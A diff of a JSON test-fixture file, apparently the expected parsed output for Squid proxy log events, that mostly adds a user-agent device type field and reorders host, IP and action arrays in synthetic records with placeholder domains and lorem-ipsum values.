@@ -2410,6 +2443,7 @@ "url.top_level_domain": "org", "user.name": "autodit", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -2481,6 +2515,7 @@ "url.top_level_domain": "net", "user.name": "reetd", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -2507,8 +2542,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "www5.example.com" + "www5.example.com", + "mail.example.net" ], "related.ip": [ "10.61.92.2", @@ -2552,6 +2587,7 @@ "url.top_level_domain": "com", "user.name": "atu", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2589,8 +2625,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "allow", - "GET" + "GET", + "allow" ], "rsa.misc.content_type": "numquam", "rsa.misc.result_code": "temUt", 
@@ -2620,6 +2656,7 @@ "url.registered_domain": "example.net", "url.top_level_domain": "net", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -2691,6 +2728,7 @@ "url.top_level_domain": "net", "user.name": "Duisa", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2721,16 +2759,16 @@ "www5.example.net" ], "related.ip": [ - "10.0.157.225", - "10.11.83.126" + "10.11.83.126", + "10.0.157.225" ], "related.user": [ "atu" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "deny" + "deny", + "PROPFIND" ], "rsa.misc.content_type": "tempor", "rsa.misc.result_code": "remipsum", @@ -2762,6 +2800,7 @@ "url.top_level_domain": "net", "user.name": "atu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2833,6 +2872,7 @@ "url.top_level_domain": "com", "user.name": "onse", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", 
@@ -2859,12 +2899,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.net", - "api.example.com" + "api.example.com", + "www5.example.net" ], "related.ip": [ - "10.102.215.23", - "10.20.28.92" + "10.20.28.92", + "10.102.215.23" ], "related.user": [ "ntexpl" @@ -2906,6 +2946,7 @@ "url.top_level_domain": "net", "user.name": "ntexpl", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -2975,6 +3016,7 @@ "url.top_level_domain": "net", "user.name": "tionula", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -3001,8 +3043,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.com", - "api.example.com" + "api.example.com", + "internal.example.com" ], "related.ip": [ "10.177.238.45", @@ -3013,8 +3055,8 @@ ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "allow", - "DELETE" + "DELETE", + "allow" ], "rsa.misc.content_type": "acom", "rsa.misc.result_code": "metco", @@ -3046,6 +3088,7 @@ "url.top_level_domain": "com", "user.name": "rsp", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", 
@@ -3076,8 +3119,8 @@ "example.com" ], "related.ip": [ - "10.101.85.169", - "10.46.77.76" + "10.46.77.76", + "10.101.85.169" ], "related.user": [ "liquid" @@ -3120,6 +3163,7 @@ "url.top_level_domain": "org", "user.name": "liquid", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3150,8 +3194,8 @@ "www5.example.org" ], "related.ip": [ - "10.24.54.129", - "10.231.7.209" + "10.231.7.209", + "10.24.54.129" ], "related.user": [ "eavol" @@ -3192,6 +3236,7 @@ "url.top_level_domain": "net", "user.name": "eavol", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3218,12 +3263,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "api.example.org" + "api.example.org", + "www.example.com" ], "related.ip": [ - "10.77.129.175", - "10.121.163.5" + "10.121.163.5", + "10.77.129.175" ], "related.user": [ "BCS" @@ -3265,6 +3310,7 @@ "url.top_level_domain": "org", "user.name": "BCS", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3291,8 +3337,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "mail.example.com" + "mail.example.com", + "www.example.com" ], "related.ip": [ "10.116.146.114", 
@@ -3336,6 +3382,7 @@ "url.top_level_domain": "com", "user.name": "obea", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -3366,16 +3413,16 @@ "internal.example.net" ], "related.ip": [ - "10.244.108.135", - "10.217.222.99" + "10.217.222.99", + "10.244.108.135" ], "related.user": [ "amvolu" ], "rsa.internal.messageid": "NONE", "rsa.misc.action": [ - "block", - "NONE" + "NONE", + "block" ], "rsa.misc.content_type": "tobeatae", "rsa.misc.result_code": "tion", @@ -3407,6 +3454,7 @@ "url.top_level_domain": "net", "user.name": "amvolu", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -3433,8 +3481,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.org" + "api.example.org", + "www.example.net" ], "related.ip": [ "10.150.198.112", @@ -3478,6 +3526,7 @@ "url.top_level_domain": "org", "user.name": "mexer", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", 
@@ -3508,8 +3557,8 @@ "www5.example.org" ], "related.ip": [ - "10.45.54.107", - "10.45.114.111" + "10.45.114.111", + "10.45.54.107" ], "related.user": [ "nse" @@ -3518,8 +3567,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "POST" + "POST", + "accept" ], "rsa.misc.content_type": "mdolors", "rsa.misc.result_code": "edictasu", @@ -3549,6 +3598,7 @@ "url.top_level_domain": "org", "user.name": "nse", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -3620,6 +3670,7 @@ "url.top_level_domain": "net", "user.name": "untutlab", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -3694,6 +3745,7 @@ "url.top_level_domain": "org", "user.name": "odoco", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -3761,6 +3813,7 @@ "url.top_level_domain": "net", "user.name": "etdol", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, 
@@ -3783,8 +3836,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "example.com" + "example.com", + "api.example.net" ], "related.ip": [ "10.162.129.196", @@ -3828,6 +3881,7 @@ "url.top_level_domain": "net", "user.name": "identsu", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -3895,6 +3949,7 @@ "url.top_level_domain": "com", "user.name": "enimadm", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -3921,12 +3976,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "internal.example.net" + "internal.example.net", + "www5.example.com" ], "related.ip": [ - "10.93.159.170", - "10.232.19.43" + "10.232.19.43", + "10.93.159.170" ], "related.user": [ "riame" @@ -3969,6 +4024,7 @@ "url.top_level_domain": "com", "user.name": "riame", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -3995,8 +4051,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "api.example.net" + "api.example.net", + "example.net" ], "related.ip": [ "10.55.55.72", 
@@ -4040,6 +4096,7 @@ "url.top_level_domain": "net", "user.name": "asp", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -4111,6 +4168,7 @@ "url.top_level_domain": "net", "user.name": "ntorever", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4184,6 +4242,7 @@ "url.top_level_domain": "org", "user.name": "mcorpo", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4210,16 +4269,16 @@ "internal.example.org" ], "related.ip": [ - "10.130.150.189", - "10.181.177.74" + "10.181.177.74", + "10.130.150.189" ], "related.user": [ "nvo" ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "LOCK", - "accept" + "accept", + "LOCK" ], "rsa.misc.content_type": "colabori", "rsa.misc.result_code": "tassita", @@ -4251,6 +4310,7 @@ "url.top_level_domain": "org", "user.name": "nvo", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -4281,8 +4341,8 @@ "api.example.net" ], "related.ip": [ - "10.83.130.95", - "10.76.220.3" + "10.76.220.3", + "10.83.130.95" ], "related.user": [ "userror" @@ -4325,6 +4385,7 @@ "url.top_level_domain": "org", "user.name": "userror", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4355,16 +4416,16 @@ "www.example.com" ], "related.ip": [ - "10.219.245.58", - "10.166.160.217" + "10.166.160.217", + "10.219.245.58" ], "related.user": [ "radip" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "COPY", - "deny" + "deny", + "COPY" ], "rsa.misc.content_type": "iameaqu", "rsa.misc.result_code": "Dui", @@ -4396,6 +4457,7 @@ "url.top_level_domain": "com", "user.name": "radip", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4420,8 +4482,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "www5.example.org" + "www5.example.org", + "example.com" ], "related.ip": [ "10.183.243.246", @@ -4465,6 +4527,7 @@ "url.top_level_domain": "org", "user.name": "tatio", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", 
@@ -4491,12 +4554,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "internal.example.net" + "internal.example.net", + "www.example.com" ], "related.ip": [ - "10.54.5.47", - "10.202.224.209" + "10.202.224.209", + "10.54.5.47" ], "related.user": [ "aturv" @@ -4536,6 +4599,7 @@ "url.top_level_domain": "net", "user.name": "aturv", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4562,20 +4626,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "mail.example.com" + "mail.example.com", + "mail.example.net" ], "related.ip": [ - "10.72.99.69", - "10.170.234.233" + "10.170.234.233", + "10.72.99.69" ], "related.user": [ "uatu" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "allow" + "allow", + "PROPFIND" ], "rsa.misc.content_type": "uido", "rsa.misc.result_code": "lab", @@ -4607,6 +4671,7 @@ "url.top_level_domain": "net", "user.name": "uatu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4633,8 +4698,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.org", - "internal.example.net" + "internal.example.net", + "api.example.org" ], "related.ip": [ "10.245.240.47", 
@@ -4678,6 +4743,7 @@ "url.top_level_domain": "org", "user.name": "odic", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -4708,8 +4774,8 @@ "api.example.net" ], "related.ip": [ - "10.61.110.7", - "10.62.188.193" + "10.62.188.193", + "10.61.110.7" ], "related.user": [ "quaU" @@ -4749,6 +4815,7 @@ "url.top_level_domain": "net", "user.name": "quaU", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4771,12 +4838,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "mail.example.net" + "mail.example.net", + "www.example.net" ], "related.ip": [ - "10.68.198.188", - "10.172.139.78" + "10.172.139.78", + "10.68.198.188" ], "related.user": [ "onsectet" @@ -4816,6 +4883,7 @@ "url.top_level_domain": "net", "user.name": "onsectet", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4856,8 +4924,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "block", - "CONNECT" + "CONNECT", + "block" ], "rsa.misc.content_type": "teturad", "rsa.misc.result_code": "avolu", 
@@ -4889,6 +4957,7 @@ "url.top_level_domain": "org", "user.name": "midestl", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4925,8 +4994,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "cancel" + "cancel", + "PURGE" ], "rsa.misc.content_type": "laboree", "rsa.misc.result_code": "oll", @@ -4956,6 +5025,7 @@ "url.top_level_domain": "org", "user.name": "deomnisi", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4982,20 +5052,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "api.example.net" + "api.example.net", + "www5.example.com" ], "related.ip": [ - "10.176.62.146", - "10.255.40.12" + "10.255.40.12", + "10.176.62.146" ], "related.user": [ "oeiusmo" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "deny", - "COPY" + "COPY", + "deny" ], "rsa.misc.content_type": "tatemac", "rsa.misc.result_code": "emeu", @@ -5027,6 +5097,7 @@ "url.top_level_domain": "net", "user.name": "oeiusmo", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", 
@@ -5097,6 +5168,7 @@ "url.subdomain": "api", "url.top_level_domain": "org", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5123,20 +5195,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "example.com" + "example.com", + "www5.example.com" ], "related.ip": [ - "10.1.27.133", - "10.5.49.20" + "10.5.49.20", + "10.1.27.133" ], "related.user": [ "tationu" ], "rsa.internal.messageid": "OPTIONS", "rsa.misc.action": [ - "block", - "OPTIONS" + "OPTIONS", + "block" ], "rsa.misc.content_type": "ntutlab", "rsa.misc.result_code": "olore", @@ -5166,6 +5238,7 @@ "url.top_level_domain": "com", "user.name": "tationu", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -5192,8 +5265,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.com", - "www5.example.org" + "www5.example.org", + "internal.example.com" ], "related.ip": [ "10.70.244.155", @@ -5206,8 +5279,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "POST" + "POST", + "accept" ], "rsa.misc.content_type": "ons", "rsa.misc.result_code": "temaccus", 
@@ -5239,6 +5312,7 @@ "url.top_level_domain": "org", "user.name": "caboNemo", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5277,8 +5351,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "accept" + "accept", + "PURGE" ], "rsa.misc.content_type": "uames", "rsa.misc.result_code": "moenimip", @@ -5310,6 +5384,7 @@ "url.top_level_domain": "net", "user.name": "cillumdo", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -5336,8 +5411,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www.example.com" + "www.example.com", + "api.example.net" ], "related.ip": [ "10.74.115.33", @@ -5381,6 +5456,7 @@ "url.top_level_domain": "net", "user.name": "roquisq", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", 
@@ -5407,12 +5483,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "mail.example.com" + "mail.example.com", + "api.example.net" ], "related.ip": [ - "10.242.48.203", - "10.191.220.1" + "10.191.220.1", + "10.242.48.203" ], "related.user": [ "isi" @@ -5452,6 +5528,7 @@ "url.top_level_domain": "net", "user.name": "isi", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -5478,8 +5555,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "internal.example.com" + "internal.example.com", + "www5.example.org" ], "related.ip": [ "10.109.88.27", @@ -5523,6 +5600,7 @@ "url.top_level_domain": "com", "user.name": "aparia", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5561,8 +5639,8 @@ ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "deny", - "LOCK" + "LOCK", + "deny" ], "rsa.misc.content_type": "etur", "rsa.misc.result_code": "remeum", @@ -5594,6 +5672,7 @@ "url.top_level_domain": "com", "user.name": "onemul", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
